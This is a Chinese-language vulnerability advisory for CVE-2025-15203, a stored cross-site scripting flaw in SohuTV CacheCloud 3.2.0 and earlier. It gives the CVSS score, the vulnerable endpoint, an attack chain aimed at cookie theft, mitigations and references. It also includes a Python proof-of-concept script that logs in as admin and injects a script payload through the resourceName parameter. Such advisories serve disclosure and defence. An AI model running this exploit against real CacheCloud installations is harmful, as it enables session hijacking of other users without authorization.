CVE-2025-15203: SohuTV CacheCloud跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-15203

漏洞类型

跨站脚本(XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

SohuTV CacheCloud

漏洞概述

CVE-2025-15203是搜狐TV开源的CacheCloud缓存管理平台中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于ResourceController.java文件的index函数中，攻击者可以通过构造恶意输入在Web界面中注入JavaScript代码。由于该漏洞需要高权限用户权限才能利用，且CVSS评分仅为2.4，属于低危漏洞。但攻击者仍可利用此漏洞窃取用户会话cookie、进行钓鱼攻击或修改页面显示内容。该漏洞影响CacheCloud 3.2.0及之前所有版本，目前漏洞利用代码已公开，项目方尚未做出响应修复。

技术细节

该漏洞位于src/main/java/com/sohu/cache/web/controller/ResourceController.java文件的index函数中。漏洞根源在于Web应用对用户输入缺乏充分的输入验证和输出编码。攻击者以高权限用户身份登录系统后，可以在资源管理功能的参数中注入恶意JavaScript代码。由于该输入被存储在数据库中并在前端页面展示，其他访问该页面的用户都会触发恶意脚本执行。攻击向量为网络远程攻击，需要用户交互才能触发。高权限要求限制了攻击面，但一旦被利用可能导致会话劫持、敏感信息泄露等安全问题。CVSS向量显示机密性和完整性影响均为低。

攻击链分析

STEP 1

步骤1

攻击者获取CacheCloud系统的高权限账号登录凭证

STEP 2

步骤2

攻击者访问/resource/index端点，在resourceName参数中注入XSS恶意载荷

STEP 3

步骤3

载荷被存储在数据库中，当其他用户访问资源管理页面时触发执行

STEP 4

步骤4

恶意JavaScript代码在受害者浏览器中执行，窃取Cookie或进行会话劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-15203 PoC - SohuTV CacheCloud XSS
# Target: SohuTV CacheCloud <= 3.2.0
# Endpoint: ResourceController.java index function

TARGET_URL = "http://target-host:8080"
LOGIN_URL = f"{TARGET_URL}/login"
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"

def login(session, username, password):
    """Login with high privilege account"""
    response = session.post(LOGIN_URL, data={
        'username': username,
        'password': password
    })
    return response.status_code == 200

def exploit_xss(session):
    """Inject XSS payload via ResourceController"""
    # Target function: index in ResourceController.java
    exploit_url = f"{TARGET_URL}/resource/index"
    
    # XSS payload injection
    params = {
        'resourceName': XSS_PAYLOAD,
        'resourceType': 'custom'
    }
    
    response = session.get(exploit_url, params=params)
    return response.status_code == 200

def main():
    session = requests.Session()
    
    # Step 1: Login with high privilege account
    if not login(session, 'admin', 'password'):
        print("Login failed")
        return
    print("[+] Login successful")
    
    # Step 2: Inject XSS payload
    if exploit_xss(session):
        print("[+] XSS payload injected successfully")
        print("[*] Wait for victim to access the page")
    else:
        print("[-] Exploitation failed")

if __name__ == "__main__":
    main()

影响范围

SohuTV CacheCloud <= 3.2.0

防御指南

临时缓解措施

临时缓解措施：在Web应用防火墙(WAF)中配置XSS防护规则，对/resource/*路径下的请求进行特殊字符过滤；限制低权限用户访问资源管理功能；启用HttpOnly和Secure标志保护Cookie安全。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15203
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15203
3 Details https://www.cvedetails.com/cve/CVE-2025-15203/
4 VulDB https://vuldb.com/cve/CVE-2025-15203
5 Link https://github.com/sohutv/cachecloud/issues/375
6 Link https://vuldb.com/?ctiid.338590
7 Link https://vuldb.com/?id.338590
8 Link https://vuldb.com/?submit.716314
9 Link https://github.com/sohutv/cachecloud/issues/375